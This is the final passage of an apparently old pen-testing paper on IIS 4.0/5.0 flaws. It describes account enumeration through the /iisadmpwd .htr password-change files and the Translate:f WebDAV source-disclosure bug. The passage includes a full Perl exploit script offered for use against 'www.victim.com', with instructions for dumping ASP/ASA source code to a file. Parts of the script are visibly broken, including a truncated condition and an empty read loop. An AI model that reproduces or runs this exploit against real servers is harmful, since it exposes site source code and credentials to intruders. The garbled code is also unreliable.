[ Pobierz całość w formacie PDF ]

/iisadmpwd  . This directory contains a number of .htr files. Anonymous
users are allowed to access this files, they are not restricted to loopback
address(127.0.0.1). The following is a list of files found in the .iisadmpwd
directory, which physically maps to c:\winnt\system32\inetsrv\iisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
This files are pretty much of the same variants of the same file and allow
a user to change their password via web. It can also be used to enumerate
valid accounts through guess work.
If the user account does not exist, a message will be returned saying
 invalid domain .
If the account exists, but the password is wrong then the message will say
so.
If an IP address followed by a backslash precedes the account name then the
IIS server will contact the remote machine, over the NetBIOS session port
139, and attempt to change to user s password. (x.x.x.x\ACCOUNTNAME)
Therefore, if you do not need this service, remove the /iisadmpwd
directory. This will prevent attackers.
=============Translate:f Bug ====================
Daniel Docekal brought this issue in BugTraq this summer, August 15, 2000.
(www.securityfocus.com/bid/1578) The actual problem is with the WebDAV
implementation in office 2000 and FrontPage 2000 Server Extensions.
When someone makes a request for ASP/ASA or anyother scriptable page and
adds  translate:f  into headers of HTTP GET (headers are not part of URL,
part of HTTP request), then they are come up with complete ASP/ASA source
code on Win2K SP1 not installed.
Translate:F is a legitimate header for WebDAV and is used in WebDAV
compatible client and in FP2000 to get the file for editing.
Simple adding of  translate:f and placing  / at the end of request to HTTP
GET will lead in security bug.
It is a Win2K bug, but due to FP2000 installed IIS4.00, it is also a IIS4.0
bug.
You can use the following perl script to use this exploit.
#############################
use IO::Socket; #
my ($port, $sock,$server); #
$size=0; #
#############################
#
$server="$ARGV[0]";
$s="$server";
$port="80";
$cm="$ARGV[1]";
&connect;
sub connect {
if ($#ARGV
howto();
 exit;
}
$ver="GET /$cm%5C HTTP/1.0
Host: $server
Accept: */*
Translate: f
\n\n";
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error:
$!";
connect(SOCK, $paddr) || die "Error: $!";
send(SOCK, $ver, 0) || die "Can't to send packet: $!";
open(OUT, ">$server.txt");
print "Dumping $cm to $server.txt \n";
while() {
print OUT ;
}
sub howto {
print "type as follows: Trans.pl www.victim.com codetoview.asp \n\n";
}
close OUT;
$n=0;
$type=2;
close(SOCK);
exit(1);
}
If we call the script as translate.pl then we can get a ASA/ASP source code
as follows
Trasn.pl www.victim.com codetoview.asp
And there you go, you get the source code of codeview.asp.
04- Conclusion
All the information i have given you has been widely used in wild. However
what i tried to do was just to collect all these information together as to
check the security of our famous IIS 4.0 and 5.0. Wheneveri encounter a IIS
web server during my pen-tests, i do check for these vulnerabilities and
most of the time one of these works.
I hope that, what i written was helped you in some way. Thanks for reading
it, please continue to support me as i continue to release this sortta
papers. If you wanna learn more, please check the mentioned people s web
sites for more details and you can even write to me.
Peace in mind
Watch your servers in wild [ Pobierz całość w formacie PDF ]